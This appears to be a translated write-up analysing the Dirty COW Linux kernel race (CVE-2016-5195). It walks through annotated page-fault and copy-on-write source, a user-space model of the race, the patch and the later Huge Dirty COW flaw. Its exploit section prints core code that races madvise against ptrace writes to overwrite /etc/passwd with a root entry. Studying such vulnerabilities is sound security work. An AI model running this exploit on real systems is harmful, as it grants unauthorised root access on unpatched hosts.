		migration_entry_wait(mm, pmd, address);
		goto retry;
	}
	if ((flags & FOLL_NUMA) && pte_protnone(pte))
		goto no_page;
	if ((flags & FOLL_WRITE) && !pte_write(pte)) {
		// we asked for a writable page but the one found is not writable: return NULL
		pte_unmap_unlock(ptep, ptl);
		return NULL;
	}

	page = vm_normal_page(vma, address, pte);
	if (unlikely(!page)) {
		if (flags & FOLL_DUMP) {
			/* Avoid special (like zero) pages in core dumps */
			page = ERR_PTR(-EFAULT);
			goto out;
		}

		if (is_zero_pfn(pte_pfn(pte))) {
			page = pte_page(pte);
		} else {
			int ret;

			ret = follow_pfn_pte(vma, address, ptep, flags);
			page = ERR_PTR(ret);
			goto out;
		}
	}

	if (flags & FOLL_GET)
		get_page_foll(page);
	if (flags & FOLL_TOUCH) {
		if ((flags & FOLL_WRITE) &&
		    !pte_dirty(pte) && !PageDirty(page))
			set_page_dirty(page);
		/*
		 * pte_mkyoung() would be more correct here, but atomic care
		 * is needed to avoid losing the dirty bit: it is easier to use
		 * mark_page_accessed().
		 */
		mark_page_accessed(page);
	}
	if ((flags & FOLL_MLOCK) && (vma->vm_flags & VM_LOCKED)) {
		/*
		 * The preliminary mapping check is mainly to avoid the
		 * pointless overhead of lock_page on the ZERO_PAGE
		 * which might bounce very badly if there is contention.
		 *
		 * If the page is already locked, we don't need to
		 * handle it now - vmscan will handle it later if and
		 * when it attempts to reclaim the page.
		 */
		if (page->mapping && trylock_page(page)) {
			lru_add_drain();  /* push cached pages to LRU */
			/*
			 * Because we lock page here, and migration is
			 * blocked by the pte's page reference, and we
			 * know the page is still mapped, we don't even
			 * need to check for file-cache page truncation.
			 */
			mlock_vma_page(page);
			unlock_page(page);
		}
	}
out:
	pte_unmap_unlock(ptep, ptl);
	return page;// write access is not required, or the page is writable: return the page
no_page:
	pte_unmap_unlock(ptep, ptl);
	if (!pte_none(pte))
		return NULL;
	return no_page_table(vma, flags);
}
//
static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma,
		unsigned long address, unsigned int *flags, int *nonblocking)
{
	unsigned int fault_flags = 0;
	int ret;

	/* mlock all present pages, but do not fault in new pages */
	if ((*flags & (FOLL_POPULATE | FOLL_MLOCK)) == FOLL_MLOCK)
		return -ENOENT;
	/* For mm_populate(), just skip the stack guard page. */
	if ((*flags & FOLL_POPULATE) &&
			(stack_guard_page_start(vma, address) ||
			 stack_guard_page_end(vma, address + PAGE_SIZE)))
		return -ENOENT;
	if (*flags & FOLL_WRITE)
		fault_flags |= FAULT_FLAG_WRITE;
	if (*flags & FOLL_REMOTE)
		fault_flags |= FAULT_FLAG_REMOTE;
	if (nonblocking)
		fault_flags |= FAULT_FLAG_ALLOW_RETRY;
	if (*flags & FOLL_NOWAIT)
		fault_flags |= FAULT_FLAG_ALLOW_RETRY | FAULT_FLAG_RETRY_NOWAIT;
	if (*flags & FOLL_TRIED) {
		VM_WARN_ON_ONCE(fault_flags & FAULT_FLAG_ALLOW_RETRY);
		fault_flags |= FAULT_FLAG_TRIED;
	}

	ret = handle_mm_fault(vma, address, fault_flags);// the page fault handler
	if (ret & VM_FAULT_ERROR) {
		if (ret & VM_FAULT_OOM)
			return -ENOMEM;
		if (ret & (VM_FAULT_HWPOISON | VM_FAULT_HWPOISON_LARGE))
			return *flags & FOLL_HWPOISON ? -EHWPOISON : -EFAULT;
		if (ret & (VM_FAULT_SIGBUS | VM_FAULT_SIGSEGV))
			return -EFAULT;
		BUG();
	}

	if (tsk) {
		if (ret & VM_FAULT_MAJOR)
			tsk->maj_flt++;
		else
			tsk->min_flt++;
	}

	if (ret & VM_FAULT_RETRY) {
		if (nonblocking)
			*nonblocking = 0;
		return -EBUSY;
	}

	/*
	 * The VM_FAULT_WRITE bit tells us that do_wp_page has broken COW when
	 * necessary, even if maybe_mkwrite decided not to set pte_write. We
	 * can thus safely do subsequent page lookups as if they were reads.
	 * But only do so when looping for pte_write is futile: in some cases
	 * userspace may also be wanting to write to the gotten user page,
	 * which a read fault here might prevent (a readonly page might get
	 * reCOWed by userspace write).
	 */
	if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
		*flags &= ~FOLL_WRITE;
	/*
	 * Once VM_FAULT_WRITE is set, COW has been broken (the copy may
	 * already be complete), so what follows can be handled as a read.
	 * (Even a write can be treated like a read, because COW has produced
	 * a new copy and both reads and writes go to that copy.) FOLL_WRITE
	 * is therefore removed, which lets us pass the check in
	 * follow_page_pte and obtain a read-only page.
	 */
	return 0;
}
// handle_mm_fault performs some checks and calls __handle_mm_fault internally
int handle_mm_fault(struct vm_area_struct *vma, unsigned long address,
		unsigned int flags)
{
	int ret;

	__set_current_state(TASK_RUNNING);

	count_vm_event(PGFAULT);
	mem_cgroup_count_vm_event(vma->vm_mm, PGFAULT);

	/* do counter updates before entering really critical section. */
	check_sync_rss_stat(current);

	/*
	 * Enable the memcg OOM handling for faults triggered in user
	 * space.  Kernel faults are handled more gracefully.
	 */
	if (flags & FAULT_FLAG_USER)
		mem_cgroup_oom_enable();

	if (!arch_vma_access_permitted(vma, flags & FAULT_FLAG_WRITE,
					    flags & FAULT_FLAG_INSTRUCTION,
					    flags & FAULT_FLAG_REMOTE))
		return VM_FAULT_SIGSEGV;

	if (unlikely(is_vm_hugetlb_page(vma)))
		ret = hugetlb_fault(vma->vm_mm, vma, address, flags);
	else
		ret = __handle_mm_fault(vma, address, flags);// the call we follow

	if (flags & FAULT_FLAG_USER) {
		mem_cgroup_oom_disable();
		/*
		 * The task may have entered a memcg OOM situation but
		 * if the allocation error was handled gracefully (no
		 * VM_FAULT_OOM), there is no need to kill anything.
		 * Just clean up the OOM state peacefully.
		 */
		if (task_in_memcg_oom(current) && !(ret & VM_FAULT_OOM))
			mem_cgroup_oom_synchronize(false);
	}

	return ret;
}
// the core of this function is handle_pte_fault
static int __handle_mm_fault(struct vm_area_struct *vma, unsigned long address,
		unsigned int flags)
{
	struct fault_env fe = {
		.vma = vma,
		.address = address,
		.flags = flags,
	};
	struct mm_struct *mm = vma->vm_mm;
	pgd_t *pgd;
	pud_t *pud;

	pgd = pgd_offset(mm, address);
	pud = pud_alloc(mm, pgd, address);
	if (!pud)
		return VM_FAULT_OOM;
	fe.pmd = pmd_alloc(mm, pud, address);
	if (!fe.pmd)
		return VM_FAULT_OOM;
	if (pmd_none(*fe.pmd) && transparent_hugepage_enabled(vma)) {
		int ret = create_huge_pmd(&fe);
		if (!(ret & VM_FAULT_FALLBACK))
			return ret;
	} else {
		pmd_t orig_pmd = *fe.pmd;
		int ret;

		barrier();
		if (pmd_trans_huge(orig_pmd) || pmd_devmap(orig_pmd)) {
			if (pmd_protnone(orig_pmd) && vma_is_accessible(vma))
				return do_huge_pmd_numa_page(&fe, orig_pmd);

			if ((fe.flags & FAULT_FLAG_WRITE) &&
					!pmd_write(orig_pmd)) {
				ret = wp_huge_pmd(&fe, orig_pmd);
				if (!(ret & VM_FAULT_FALLBACK))
					return ret;
			} else {
				huge_pmd_set_accessed(&fe, orig_pmd);
				return 0;
			}
		}
	}

	return handle_pte_fault(&fe);
}
// This is the core page fault function; it handles the various fault cases and is
// covered in detail in Chapter 9 of Understanding the Linux Kernel
static int handle_pte_fault(struct fault_env *fe)
{
	pte_t entry;

	if (unlikely(pmd_none(*fe->pmd))) {
		/*
		 * Leave __pte_alloc() until later: because vm_ops->fault may
		 * want to allocate huge page, and if we expose page table
		 * for an instant, it will be difficult to retract from
		 * concurrent faults and from rmap lookups.
		 */
		fe->pte = NULL;// no pmd table means no pte entry
	} else {
		/* See comment in pte_alloc_one_map() */
		if (pmd_trans_unstable(fe->pmd) || pmd_devmap(*fe->pmd))
			return 0;
		/*
		 * A regular pmd is established and it can't morph into a huge
		 * pmd from under us anymore at this point because we hold the
		 * mmap_sem read mode and khugepaged takes it in write mode.
		 * So now it's safe to run pte_offset_map().
		 */
		fe->pte = pte_offset_map(fe->pmd, fe->address);

		entry = *fe->pte;

		/*
		 * some architectures can have larger ptes than wordsize,
		 * e.g.ppc44x-defconfig has CONFIG_PTE_64BIT=y and
		 * CONFIG_32BIT=y, so READ_ONCE or ACCESS_ONCE cannot guarantee
		 * atomic accesses.  The code below just needs a consistent
		 * view for the ifs and we later double check anyway with the
		 * ptl lock held. So here a barrier will do.
		 */
		barrier();
		if (pte_none(entry)) {
			pte_unmap(fe->pte);
			fe->pte = NULL;
		}
	}

	if (!fe->pte) {
		if (vma_is_anonymous(fe->vma))
			return do_anonymous_page(fe);// the VMA maps no disk file, i.e. an anonymous mapping
		else
			return do_fault(fe);// no page table entry yet: the first demand-paging fault ends up here
	}

	/*
	 * The process has accessed this page before, but its contents are
	 * temporarily stored on disk. The kernel recognizes this case because
	 * the entry is not zero-filled while its Present and Dirty flags are 0.
	 */
	if (!pte_present(entry))
		return do_swap_page(fe, entry);

	if (pte_protnone(entry) && vma_is_accessible(fe->vma))
		return do_numa_page(fe, entry);

	fe->ptl = pte_lockptr(fe->vma->vm_mm, fe->pmd);
	spin_lock(fe->ptl);
	if (unlikely(!pte_same(*fe->pte, entry)))
		goto unlock;
	if (fe->flags & FAULT_FLAG_WRITE) {
		if (!pte_write(entry))
			return do_wp_page(fe, entry);// we want to write and the page is not writable: COW is activated
		entry = pte_mkdirty(entry);
	}
	entry = pte_mkyoung(entry);
	if (ptep_set_access_flags(fe->vma, fe->address, fe->pte, entry,
				fe->flags & FAULT_FLAG_WRITE)) {
		update_mmu_cache(fe->vma, fe->address, fe->pte);
	} else {
		/*
		 * This is needed only for protection faults but the arch code
		 * is not yet telling us if this is a protection fault or not.
		 * This still avoids useless tlb flushes for .text page faults
		 * with threads.
		 */
		if (fe->flags & FAULT_FLAG_WRITE)
			flush_tlb_fix_spurious_fault(fe->vma, fe->address);
	}
unlock:
	pte_unmap_unlock(fe->pte, fe->ptl);
	return 0;
}
//
/*
 * We enter with non-exclusive mmap_sem (to exclude vma changes,
 * but allow concurrent faults).
 * The mmap_sem may have been released depending on flags and our
 * return value.  See filemap_fault() and __lock_page_or_retry().
 */
static int do_fault(struct fault_env *fe)
{
	struct vm_area_struct *vma = fe->vma;
	pgoff_t pgoff = linear_page_index(vma, fe->address);

	/* The VMA was not fully populated on mmap() or missing VM_DONTEXPAND */
	if (!vma->vm_ops->fault)
		return VM_FAULT_SIGBUS;
	if (!(fe->flags & FAULT_FLAG_WRITE))
		return do_read_fault(fe, pgoff);// write access is not requested: call do_read_fault
	if (!(vma->vm_flags & VM_SHARED))
		return do_cow_fault(fe, pgoff);/* write access is requested on a private mapping: do_cow_fault performs the COW */
	return do_shared_fault(fe, pgoff);// shared mapping
}
//
static int do_cow_fault(struct fault_env *fe, pgoff_t pgoff)
{
	struct vm_area_struct *vma = fe->vma;
	struct page *fault_page, *new_page;
	void *fault_entry;
	struct mem_cgroup *memcg;
	int ret;

	if (unlikely(anon_vma_prepare(vma)))
		return VM_FAULT_OOM;//out of memory

	new_page = alloc_page_vma(GFP_HIGHUSER_MOVABLE, vma, fe->address);// allocate a new page
	if (!new_page)
		return VM_FAULT_OOM;

	if (mem_cgroup_try_charge(new_page, vma->vm_mm, GFP_KERNEL,
				&memcg, false)) {
		put_page(new_page);
		return VM_FAULT_OOM;
	}

	ret = __do_fault(fe, pgoff, new_page, &fault_page, &fault_entry);/* read the file content; it is copied into new_page below */
	if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
		goto uncharge_out;

	if (!(ret & VM_FAULT_DAX_LOCKED))
		copy_user_highpage(new_page, fault_page, fe->address, vma);
	__SetPageUptodate(new_page);

	ret |= alloc_set_pte(fe, memcg, new_page);// install the mapping between the virtual address and the new page in the page table
	if (fe->pte)
		pte_unmap_unlock(fe->pte, fe->ptl);
	if (!(ret & VM_FAULT_DAX_LOCKED)) {
		unlock_page(fault_page);
		put_page(fault_page);
	} else {
		dax_unlock_mapping_entry(vma->vm_file->f_mapping, pgoff);
	}
	if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
		goto uncharge_out;
	return ret;
uncharge_out:
	mem_cgroup_cancel_charge(new_page, memcg, false);
	put_page(new_page);
	return ret;
}
//
/**
 * alloc_set_pte - setup new PTE entry for given page and add reverse page
 * mapping. If needed, the function allocates page table or use pre-allocated.
 *
 * @fe: fault environment
 * @memcg: memcg to charge page (only for private mappings)
 * @page: page to map
 *
 * Caller must take care of unlocking fe->ptl, if fe->pte is non-NULL on return.
 *
 * Target users are page handler itself and implementations of
 * vm_ops->map_pages.
 */
int alloc_set_pte(struct fault_env *fe, struct mem_cgroup *memcg,
		struct page *page)
{
	struct vm_area_struct *vma = fe->vma;
	bool write = fe->flags & FAULT_FLAG_WRITE;// write access was requested
	pte_t entry;
	int ret;

	if (pmd_none(*fe->pmd) && PageTransCompound(page) &&
			IS_ENABLED(CONFIG_TRANSPARENT_HUGE_PAGECACHE)) {
		/* THP on COW? */
		VM_BUG_ON_PAGE(memcg, page);

		ret = do_set_pmd(fe, page);
		if (ret != VM_FAULT_FALLBACK)
			return ret;
	}

	if (!fe->pte) {
		ret = pte_alloc_one_map(fe);
		if (ret)
			return ret;
	}

	/* Re-check under ptl */
	if (unlikely(!pte_none(*fe->pte)))
		return VM_FAULT_NOPAGE;

	flush_icache_page(vma, page);
	entry = mk_pte(page, vma->vm_page_prot);
	if (write)
		entry = maybe_mkwrite(pte_mkdirty(entry), vma);
	/* copy-on-write page */
	if (write && !(vma->vm_flags & VM_SHARED)) {
		inc_mm_counter_fast(vma->vm_mm, MM_ANONPAGES);
		page_add_new_anon_rmap(page, vma, fe->address, false);// set up the mapping
		mem_cgroup_commit_charge(page, memcg, false, false);
		lru_cache_add_active_or_unevictable(page, vma);// update the LRU cache
	} else {
		inc_mm_counter_fast(vma->vm_mm, mm_counter_file(page));
		page_add_file_rmap(page, false);
	}
	set_pte_at(vma->vm_mm, fe->address, fe->pte, entry);// set the page table entry

	/* no need to invalidate: a not-present page won't be cached */
	update_mmu_cache(vma, fe->address, fe->pte);

	return 0;
}
//
/*
 * Do pte_mkwrite, but only if the vma says VM_WRITE.  We do this when
 * servicing faults for write access.  In the normal case, do always want
 * pte_mkwrite.  But get_user_pages can cause write faults for mappings
 * that do not have writing enabled, when used by access_process_vm.
 */
static inline pte_t maybe_mkwrite(pte_t pte, struct vm_area_struct *vma)
{
	/*
	 * In our case the VMA's vm_flags do not include VM_WRITE, so the pte
	 * entry is not made writable here; it is only readable and dirty.
	 */
	if (likely(vma->vm_flags & VM_WRITE))
		pte = pte_mkwrite(pte);
	return pte;
}
static inline pte_t pte_mkwrite(pte_t pte)
{
	return set_pte_bit(pte, __pgprot(PTE_WRITE));
}
// The calls above make up the first round of fault handling, which ends with a new
// pte entry whose attributes are read-only/dirty/present.
// Execution then returns to retry; what follows is the second round of fault handling.
// The copy-on-write handler:
/*
 * This routine handles present pages, when users try to write
 * to a shared page. It is done by copying the page to a new address
 * and decrementing the shared-page counter for the old page.
 *
 * Note that this routine assumes that the protection checks have been
 * done by the caller (the low-level page fault routine in most cases).
 * Thus we can safely just mark it writable once we've done any necessary
 * COW.
 *
 * We also mark the page dirty at this point even though the page will
 * change only once the write actually happens. This avoids a few races,
 * and potentially makes it more efficient.
 *
 * We enter with non-exclusive mmap_sem (to exclude vma changes,
 * but allow concurrent faults), with pte both mapped and locked.
 * We return with mmap_sem still held, but pte unmapped and unlocked.
 */
static int do_wp_page(struct fault_env *fe, pte_t orig_pte)
	__releases(fe->ptl)
{
	struct vm_area_struct *vma = fe->vma;
	struct page *old_page;

	old_page = vm_normal_page(vma, fe->address, orig_pte);// get the old page descriptor
	if (!old_page) {
		/*
		 * VM_MIXEDMAP !pfn_valid() case, or VM_SOFTDIRTY clear on a
		 * VM_PFNMAP VMA.
		 *
		 * We should not cow pages in a shared writeable mapping.
		 * Just mark the pages writable and/or call ops->pfn_mkwrite.
		 */
		if ((vma->vm_flags & (VM_WRITE|VM_SHARED)) ==
				     (VM_WRITE|VM_SHARED))
			return wp_pfn_shared(fe, orig_pte);// VM_SHARED: a special mapping that uses PFNs

		pte_unmap_unlock(fe->pte, fe->ptl);
		return wp_page_copy(fe, orig_pte, old_page);
	}

	/*
	 * Take out anonymous pages first, anonymous shared vmas are
	 * not dirty accountable.
	 */
	/*
	 * PageAnon means the page has already been COWed. If this process is
	 * the only user of the page, it can be reused directly with no new COW.
	 */
	if (PageAnon(old_page) && !PageKsm(old_page)) {
		int total_mapcount;
		if (!trylock_page(old_page)) { /* take the page lock */
			get_page(old_page);
			pte_unmap_unlock(fe->pte, fe->ptl);
			lock_page(old_page);
			fe->pte = pte_offset_map_lock(vma->vm_mm, fe->pmd,
					fe->address, &fe->ptl);
			if (!pte_same(*fe->pte, orig_pte)) {
				unlock_page(old_page);
				pte_unmap_unlock(fe->pte, fe->ptl);
				put_page(old_page);
				return 0;
			}
			put_page(old_page);
		}
		if (reuse_swap_page(old_page, &total_mapcount)) {
			/*
			 * total_mapcount == 1 means only this process maps the
			 * page; wp_page_reuse() is then called to reuse it.
			 */
			if (total_mapcount == 1) {
				/*
				 * The page is all ours. Move it to
				 * our anon_vma so the rmap code will
				 * not search our parent or siblings.
				 * Protected against the rmap code by
				 * the page lock.
				 */
				page_move_anon_rmap(old_page, vma);
			}
			unlock_page(old_page);
			return wp_page_reuse(fe, orig_pte, old_page, 0, 0);
		}
		unlock_page(old_page);
	} else if (unlikely((vma->vm_flags & (VM_WRITE|VM_SHARED)) ==
					(VM_WRITE|VM_SHARED))) {
		return wp_page_shared(fe, orig_pte, old_page);
	}

	/*
	 * Ok, we need to copy. Oh, well..
	 */
	get_page(old_page);

	pte_unmap_unlock(fe->pte, fe->ptl);
	return wp_page_copy(fe, orig_pte, old_page);
}

// Handles write faults on pages that can be reused in the current VMA
/*
 * Handle write page faults for pages that can be reused in the current vma
 *
 * This can happen either due to the mapping being with the VM_SHARED flag,
 * or due to us being the last reference standing to the page. In either
 * case, all we need to do here is to mark the page as writable and update
 * any related book-keeping.
 */
static inline int wp_page_reuse(struct fault_env *fe, pte_t orig_pte,
			struct page *page, int page_mkwrite, int dirty_shared)
	__releases(fe->ptl)
{
	struct vm_area_struct *vma = fe->vma;
	pte_t entry;
	/*
	 * Clear the pages cpupid information as the existing
	 * information potentially belongs to a now completely
	 * unrelated process.
	 */
	if (page)
		page_cpupid_xchg_last(page, (1 << LAST_CPUPID_SHIFT) - 1);

	flush_cache_page(vma, fe->address, pte_pfn(orig_pte));
	entry = pte_mkyoung(orig_pte);
	entry = maybe_mkwrite(pte_mkdirty(entry), vma);
	if (ptep_set_access_flags(vma, fe->address, fe->pte, entry, 1))
		update_mmu_cache(vma, fe->address, fe->pte);
	pte_unmap_unlock(fe->pte, fe->ptl);

	if (dirty_shared) {
		struct address_space *mapping;
		int dirtied;

		if (!page_mkwrite)
			lock_page(page);

		dirtied = set_page_dirty(page);
		VM_BUG_ON_PAGE(PageAnon(page), page);
		mapping = page->mapping;
		unlock_page(page);
		put_page(page);

		if ((dirtied || page_mkwrite) && mapping) {
			/*
			 * Some device drivers do not set page.mapping
			 * but still dirty their pages
			 */
			balance_dirty_pages_ratelimited(mapping);
		}

		if (!page_mkwrite)
			file_update_time(vma->vm_file);
	}

	return VM_FAULT_WRITE; /* tells the caller that COW is done, so it can break out */
}

/*
 * After the break, the racing thread calls madvise and the page table entry
 * is cleared, so the COWed page can no longer be found. A third page lookup
 * follows, fails on the PTE, and a fourth round of fault handling runs:
 *
 * do_fault:
 *	if (!(fe->flags & FAULT_FLAG_WRITE))
 *		return do_read_fault(fe, pgoff);
 *
 * do_read_fault is called when the request does not ask for write access.
 * Because the WRITE flag of our request has already been cleared, the fault
 * is served as a read-only request.
 */
static int do_read_fault(struct fault_env *fe, pgoff_t pgoff)
{
	struct vm_area_struct *vma = fe->vma;
	struct page *fault_page;
	int ret = 0;

	/*
	 * Let's call ->map_pages() first and use ->fault() as fallback
	 * if page by the offset is not ready to be mapped (cold cache or
	 * something).
	 */
	if (vma->vm_ops->map_pages && fault_around_bytes >> PAGE_SHIFT > 1) {
		ret = do_fault_around(fe, pgoff);
		if (ret)
			return ret;
	}

	ret = __do_fault(fe, pgoff, NULL, &fault_page, NULL); /* called here; the third argument (cow_page) is NULL */
	if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
		return ret;

	ret |= alloc_set_pte(fe, NULL, fault_page);
	if (fe->pte)
		pte_unmap_unlock(fe->pte, fe->ptl);
	unlock_page(fault_page);
	if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
		put_page(fault_page);
	return ret;
}

// cow_page == NULL means this is not a COW fault
/*
 * The mmap_sem must have been held on entry, and may have been
 * released depending on flags and vma->vm_ops->fault() return value.
 * See filemap_fault() and __lock_page_retry().
 */
static int __do_fault(struct fault_env *fe, pgoff_t pgoff,
		struct page *cow_page, struct page **page, void **entry)
{
	struct vm_area_struct *vma = fe->vma;
	struct vm_fault vmf;
	int ret;

	vmf.virtual_address = (void __user *)(fe->address & PAGE_MASK);
	vmf.pgoff = pgoff;
	vmf.flags = fe->flags;
	vmf.page = NULL;
	vmf.gfp_mask = __get_fault_gfp_mask(vma);
	vmf.cow_page = cow_page;

	/*
	 * vma->vm_ops->fault reads the file contents into the fault page;
	 * if a new (COW) page was supplied, the contents are then copied into it.
	 */
	ret = vma->vm_ops->fault(vma, &vmf);
	if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
		return ret;
	if (ret & VM_FAULT_DAX_LOCKED) {
		*entry = vmf.entry;
		return ret;
	}

	if (unlikely(PageHWPoison(vmf.page))) {
		if (ret & VM_FAULT_LOCKED)
			unlock_page(vmf.page);
		put_page(vmf.page);
		return VM_FAULT_HWPOISON;
	}

	if (unlikely(!(ret & VM_FAULT_LOCKED)))
		lock_page(vmf.page);
	else
		VM_BUG_ON_PAGE(!PageLocked(vmf.page), vmf.page);

	*page = vmf.page;
	return ret;
}
// At this point fault_page has given us the page that this process maps
// read-only (the file's own page), and the write to it succeeds.
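The sequence of faults traced above can be condensed into a small user-space model. This is only a sketch under simplifying assumptions, not kernel code: `struct model`, `enum page_kind`, `follow_page`, `faultin_page` and `get_user_page_for_write` are hypothetical names that loosely mirror the lookup/fault retry loop, and the racing madvise is reduced to "clear the PTE right after fault number N".

```c
#include <stdbool.h>

#define FOLL_WRITE 0x01u

/* What the (modelled) PTE currently points at. */
enum page_kind { PAGE_NONE, PAGE_CACHE, PAGE_COW };

struct model {
	enum page_kind pte_page;  /* PAGE_NONE means the PTE is empty */
	bool pte_writable;        /* never set: the VMA has no VM_WRITE */
	int zap_after_fault;      /* fault number after which madvise zaps the PTE, 0 = never */
	int faults;               /* faults handled so far */
};

/* Lookup step: a write request is refused while the PTE is read-only. */
static enum page_kind follow_page(const struct model *m, unsigned int flags)
{
	if (m->pte_page == PAGE_NONE)
		return PAGE_NONE;
	if ((flags & FOLL_WRITE) && !m->pte_writable)
		return PAGE_NONE;
	return m->pte_page;
}

/* Fault step, pre-patch behaviour: FOLL_WRITE is dropped once COW is done. */
static void faultin_page(struct model *m, unsigned int *flags)
{
	m->faults++;
	if (m->pte_page == PAGE_NONE) {
		/* Empty PTE: a write fault makes a private copy, a read fault maps the file page. */
		m->pte_page = (*flags & FOLL_WRITE) ? PAGE_COW : PAGE_CACHE;
		m->pte_writable = false;
	} else if (*flags & FOLL_WRITE) {
		/* Present read-only PTE: the COW page is reused and the write flag is cleared. */
		*flags &= ~FOLL_WRITE;
	}
	if (m->faults == m->zap_after_fault)
		m->pte_page = PAGE_NONE; /* racing madvise(MADV_DONTNEED) */
}

/* Returns the kind of page a forced write would finally land on. */
enum page_kind get_user_page_for_write(int zap_after_fault)
{
	struct model m = { PAGE_NONE, false, zap_after_fault, 0 };
	unsigned int flags = FOLL_WRITE;
	enum page_kind page;

	while ((page = follow_page(&m, flags)) == PAGE_NONE)
		faultin_page(&m, &flags);
	return page;
}
```

In this model, `get_user_page_for_write(0)` and `get_user_page_for_write(1)` end on the private copy, while `get_user_page_for_write(2)` ends on the file's page, which matches the window described above: the zap has to land after the write flag was dropped and before the next lookup.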

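Exploit analysis

The core of the exploit is short. The earlier part backs up /etc/passwd and generates the new root password line. f is the file descriptor of the target file; mmap maps it into a read-only MAP_PRIVATE region, and the program then forks a child. The parent repeatedly calls ptrace with PTRACE_POKETEXT, which copies complete_passwd_line into the memory that map points to in the child, trying again and again to modify this read-only memory. The child starts a thread, madviseThread, which calls madvise(MADV_DONTNEED) in a loop to discard the mapped page and clear its page table entry.

Eventually madvise happens to run right after the second page fault has been handled. The write then lands on the page frame that backs the original file mapping instead of the COW page, so the in-memory contents of /etc/passwd are modified, and the password file itself is changed once that page frame is written back to disk.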

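void *madviseThread(void *arg)
{
	int i, c = 0;

	/* Keep discarding the page so that its page table entry is cleared again and again. */
	for (i = 0; i < 200000000; i++) {
		c += madvise(map, 100, MADV_DONTNEED);
	}
	printf("madvise %d\n\n", c);
	return NULL;
}
...
	/* Read-only private mapping of the target file. */
	map = mmap(NULL, st.st_size + sizeof(long), PROT_READ, MAP_PRIVATE, f, 0);
	printf("mmap: %lx\n", (unsigned long)map);
	pid = fork();
	if (pid) {
		/* Parent: wait until the child has stopped itself, then poke its memory. */
		waitpid(pid, NULL, 0);
		int u, i, o, c = 0;
		int l = strlen(complete_passwd_line);
		for (i = 0; i < 10000/l; i++) {
			for (o = 0; o < l; o++) {
				for (u = 0; u < 10000; u++) {
					/* Write one long of the new passwd line at offset o of the mapping. */
					c += ptrace(PTRACE_POKETEXT, pid, map + o,
						    *((long *)(complete_passwd_line + o)));
				}
			}
		}
		printf("ptrace %d\n", c);
	} else {
		/* Child: start the madvise thread, then let the parent trace us. */
		pthread_create(&pth, NULL, madviseThread, NULL);
		ptrace(PTRACE_TRACEME);
		kill(getpid(), SIGSTOP);
		pthread_join(pth, NULL);
	}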
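The role of madvise in the race is easier to see in isolation. The sketch below is not part of the exploit: it uses an ordinary writable MAP_PRIVATE mapping of a scratch file (the path template and the function name `dontneed_discards_cow_copy` are made up for illustration) and checks that MADV_DONTNEED throws away the private COW copy, so that the next access is served from the file again. It assumes Linux and a writable /tmp.

```c
#define _GNU_SOURCE
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/*
 * Returns 1 if the private copy was visible after the write and the file
 * contents came back after MADV_DONTNEED, 0 if not, -1 on a setup error.
 */
int dontneed_discards_cow_copy(void)
{
	char path[] = "/tmp/cow_demo_XXXXXX"; /* hypothetical scratch file */
	const char original[] = "original";
	const char modified[] = "modified";   /* same length as original */
	char *map;
	int copy_visible;
	int result = -1;

	int fd = mkstemp(path);
	if (fd < 0)
		return -1;
	unlink(path); /* the file lives on only through fd */

	if (write(fd, original, sizeof(original)) != (ssize_t)sizeof(original))
		goto out;

	map = mmap(NULL, sizeof(original), PROT_READ | PROT_WRITE,
		   MAP_PRIVATE, fd, 0);
	if (map == MAP_FAILED)
		goto out;

	/* The write fault gives this process its own copy of the page. */
	memcpy(map, modified, sizeof(modified));
	copy_visible = memcmp(map, modified, sizeof(modified)) == 0;

	/* Drop the private copy; the next access faults the file page back in. */
	if (madvise(map, sizeof(original), MADV_DONTNEED) == 0)
		result = copy_visible &&
			 memcmp(map, original, sizeof(original)) == 0;

	munmap(map, sizeof(original));
out:
	close(fd);
	return result;
}
```

A caller would simply check that `dontneed_discards_cow_copy()` returns 1. In the exploit the same discard happens on a read-only mapping while another thread of control is in the middle of a forced write.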

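Patch

The patch is linked here: git-kernel. It adds a new flag, FOLL_COW. After faultin_page has obtained a COWed page, FOLL_WRITE is no longer cleared; instead FOLL_COW is set to record that the COW has already taken place. Even if the racing thread clears the page table entry, the lookup no longer hands back the original page frame just because FOLL_WRITE is missing; the fault is handled as a write again and a new COW page frame is allocated.

The patch was not complete, however. The handling of transparent huge pages (THP) still had a flaw, and about a year later it led to a new vulnerability, Huge Dirty COW (CVE-2017-1000405).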
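The check that the fix introduces can be modelled in user space as follows. This is a sketch, not the kernel source: `struct pte_model` and `follow_page_allows` are hypothetical stand-ins for the real PTE helpers and lookup path, and the flag values are only there to make the example compile.

```c
#include <stdbool.h>

/* Illustrative flag values for this model. */
#define FOLL_WRITE 0x01u
#define FOLL_FORCE 0x10u
#define FOLL_COW   0x4000u

/* Hypothetical, simplified view of a page table entry. */
struct pte_model {
	bool present;
	bool writable;
	bool dirty;
};

/*
 * A write through a read-only PTE is accepted only for a forced access
 * that has already gone through COW (FOLL_COW) and whose PTE is dirty.
 */
static bool can_follow_write_pte(struct pte_model pte, unsigned int flags)
{
	return pte.writable ||
	       ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte.dirty);
}

/* True if the lookup may hand out the page for this request. */
bool follow_page_allows(struct pte_model pte, unsigned int flags)
{
	if (!pte.present)
		return false;
	if ((flags & FOLL_WRITE) && !can_follow_write_pte(pte, flags))
		return false;
	return true;
}
```

Because FOLL_WRITE now stays set for the whole operation, a PTE that was zapped and refilled by anything other than a fresh COW (not dirty, or FOLL_COW not yet set) is rejected and the write fault is taken again.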

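Summary

Personally I find Dirty COW fairly friendly to newcomers, unlike bpf/ebpf bugs, which require reading source code for a long time. The exploit is short, there is plenty of material online, and a few days of patient analysis is enough to work out the exploitation logic.

References

The overview of the vulnerability logic in this article quotes atum's article; many thanks to atum for the analysis.

《深入理解Linux内核》 (Understanding the Linux Kernel), chapters 2 and 9

《奔跑吧Linux内核-内存管理DirtyCow》 (Run Linux Kernel: memory management, Dirty COW)

Linux-kernel-4.4.0-31-generic source code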